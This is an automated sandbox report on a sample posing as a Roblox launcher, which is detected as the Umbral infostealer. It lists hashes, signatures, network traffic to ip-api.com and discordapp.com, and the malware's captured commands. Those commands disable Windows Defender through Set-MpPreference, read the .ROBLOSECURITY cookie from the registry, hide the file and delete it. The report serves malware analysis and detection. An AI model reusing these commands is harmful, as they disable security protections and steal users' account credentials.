Overview

overview

10

Static

static

10

pluh/exter...er.exe

windows10-1703-x64

10

pluh/exter...er.exe

windows10-2004-x64

10

pluh/exter...er.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13/04/2024, 10:34 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pluh/external roblox launcher.exe

  • Size

    229KB

  • MD5

    65536dc4bcafc3ee3c1dcf7ed64c12df

  • SHA1

    e1ca248ae2ef47a6b89ad6fb155f4d5ec3674e9c

  • SHA256

    98e7e144b7bc45bd52601d093b1e447cf486bf2e8cd2ba84e8325e2d7b269662

  • SHA512

    25f5043750e42d312b879dcb1b37bc4621790f7402befa21578818c8de6020f1983a984bde79eeaca60b3cd12654fe2dae6e728826e0c4da3794be3519d3bcc2

  • SSDEEP

    6144:OwloZM3fsXtioRkts/cnnK6cMlkCanywvrY8hkijD6yBeb8e1mvpi:PoZ1tlRk83MlkCanywvrY8hkijD6yQiw

Score
10/10
umbralspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\pluh\external roblox launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\pluh\external roblox launcher.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4360
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\pluh\external roblox launcher.exe"
      2⤵
      • Views/modifies file attributes
      PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\pluh\external roblox launcher.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1032
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1036
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1044
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:4300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1480
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2416
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\pluh\external roblox launcher.exe" && pause
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • Runs ping.exe
            PID:4088

      Network

      • flag-us
        DNS
        gstatic.com
        external roblox launcher.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        142.250.200.35
      • flag-us
        DNS
        ip-api.com
        external roblox launcher.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        external roblox launcher.exe
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        external roblox launcher.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        233.134.159.162.in-addr.arpa
        external roblox launcher.exe
        Remote address:
        8.8.8.8:53
        Request
        233.134.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        self.events.data.microsoft.com
        external roblox launcher.exe
        Remote address:
        8.8.8.8:53
        Request
        self.events.data.microsoft.com
        IN A
        Response
        self.events.data.microsoft.com
        IN CNAME
        self-events-data.trafficmanager.net
        self-events-data.trafficmanager.net
        IN CNAME
        onedscolprdwus15.westus.cloudapp.azure.com
        onedscolprdwus15.westus.cloudapp.azure.com
        IN A
        20.189.173.18
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        external roblox launcher.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Sat, 13 Apr 2024 10:34:55 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 33
        X-Rl: 40
      • flag-us
        DNS
        35.200.250.142.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        35.200.250.142.in-addr.arpa
        IN PTR
        Response
        35.200.250.142.in-addr.arpa
        IN PTR
        lhr48s30-in-f31e100net
      • flag-us
        DNS
        discordapp.com
        Remote address:
        8.8.8.8:53
        Request
        discordapp.com
        IN A
        Response
        discordapp.com
        IN A
        162.159.134.233
        discordapp.com
        IN A
        162.159.133.233
        discordapp.com
        IN A
        162.159.130.233
        discordapp.com
        IN A
        162.159.129.233
        discordapp.com
        IN A
        162.159.135.233
      • flag-us
        DNS
        nexusrules.officeapps.live.com
        Remote address:
        8.8.8.8:53
        Request
        nexusrules.officeapps.live.com
        IN A
        Response
        nexusrules.officeapps.live.com
        IN CNAME
        prod.nexusrules.live.com.akadns.net
        prod.nexusrules.live.com.akadns.net
        IN A
        52.111.243.30
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        external roblox launcher.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Sat, 13 Apr 2024 10:35:03 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 164
        Access-Control-Allow-Origin: *
        X-Ttl: 24
        X-Rl: 37
      • 142.250.200.35:443
        gstatic.com
        tls
        external roblox launcher.exe
        849 B
         5.4kB
         9
        8
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        external roblox launcher.exe
        310 B
         267 B
         5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        external roblox launcher.exe
        285 B
         513 B
         5
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.134.233:443
        discordapp.com
        tls
        external roblox launcher.exe
        445.7kB
         12.7kB
         334
        145
      • 8.8.8.8:53
        gstatic.com
        dns
        external roblox launcher.exe
        400 B
         660 B
         6
        6

        DNS Request

        gstatic.com

        DNS Response

        142.250.200.35

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        1.112.95.208.in-addr.arpa

        DNS Request

        233.134.159.162.in-addr.arpa

        DNS Request

        self.events.data.microsoft.com

        DNS Response

        20.189.173.18

      • 8.8.8.8:53
        35.200.250.142.in-addr.arpa
        dns
        281 B
         550 B
         4
        4

        DNS Request

        35.200.250.142.in-addr.arpa

        DNS Request

        discordapp.com

        DNS Response

        162.159.134.233
        162.159.133.233
        162.159.130.233
        162.159.129.233
        162.159.135.233

        DNS Request

        nexusrules.officeapps.live.com

        DNS Response

        52.111.243.30

        DNS Request

        18.173.189.20.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        2e8eb51096d6f6781456fef7df731d97

        SHA1

        ec2aaf851a618fb43c3d040a13a71997c25bda43

        SHA256

        96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

        SHA512

        0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        9d95ef974f6c0608ef5362d05d14440d

        SHA1

        80d09108e95f4695b3ccb3f73710a934406be9bb

        SHA256

        a03be3ffa46d3aadbe570364b7fa85cc221355591f67ab06d5ec19f2fb9ba396

        SHA512

        4e63a4bfd09661a021d5d317b76600a84de03c7f748fc77ad373eaa93c97b58b53f13b171807a78eec6c12dbab58c8bc9b903296f28555631066bb73153ce410

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        fb2c523128a7b6c6f309e3a45b1c2bd1

        SHA1

        423c4df1f178fbc37366f56cb1854dca619426dc

        SHA256

        b33d564629223db7f77553d7713145f4ddb168eddb5c25ccb96c7d857b8b3541

        SHA512

        f75067b644a771225f3daff7aa52a3013bfdb00088b7c0464fc35f79a9c5d633f1fdf963490affb52cbcbd21b4895a10cdbb605934fe654f4aa325aa2c82a10f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        6ca67a1a64ff4dd3f09a2393fccba8fa

        SHA1

        906350e7db31efc71679bbdbbcf1133aa2d31c1d

        SHA256

        6bc103c2e75b013034c77bb204ccbe43c365e9b6cb1697b9b5a1e20dda43427e

        SHA512

        4d1d3d52107b2eb2faf6918d0559a08acbe89b6a889f6300c55742d91f596a6764c637fc386c80ecbc434d0496ee83f243054c66b9eeb7adef4b2093e932b066

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqa4peov.mzx.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/1032-77-0x0000022898780000-0x0000022898790000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1032-79-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1032-75-0x0000022898780000-0x0000022898790000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1032-74-0x0000022898780000-0x0000022898790000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1032-65-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1480-94-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1480-95-0x000001F7F7FB0000-0x000001F7F7FC0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1480-96-0x000001F7F7FB0000-0x000001F7F7FC0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1480-98-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2180-41-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2180-64-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2180-53-0x000001F96CCE0000-0x000001F96CCF0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2180-49-0x000001F96CCE0000-0x000001F96CCF0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2464-17-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2464-29-0x0000023FC9010000-0x0000023FC9020000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2464-18-0x0000023FC9010000-0x0000023FC9020000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2464-19-0x0000023FC9010000-0x0000023FC9020000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2464-33-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2464-31-0x0000023FC9010000-0x0000023FC9020000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3560-4-0x00000184FB730000-0x00000184FB740000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3560-16-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3560-3-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3560-13-0x00000184FB740000-0x00000184FB762000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3560-14-0x00000184FB730000-0x00000184FB740000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4360-81-0x000001F33EF70000-0x000001F33EF7A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4360-0-0x000001F3247F0000-0x000001F324830000-memory.dmp

        Filesize

        256KB

        Download

      • memory/4360-30-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4360-82-0x000001F33F0C0000-0x000001F33F0D2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4360-37-0x000001F33F030000-0x000001F33F080000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4360-38-0x000001F33EF50000-0x000001F33EF6E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4360-36-0x000001F33EFB0000-0x000001F33F026000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4360-2-0x000001F3265D0000-0x000001F3265E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4360-1-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4360-103-0x00007FF8AC040000-0x00007FF8ACB02000-memory.dmp

        Filesize

        10.8MB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.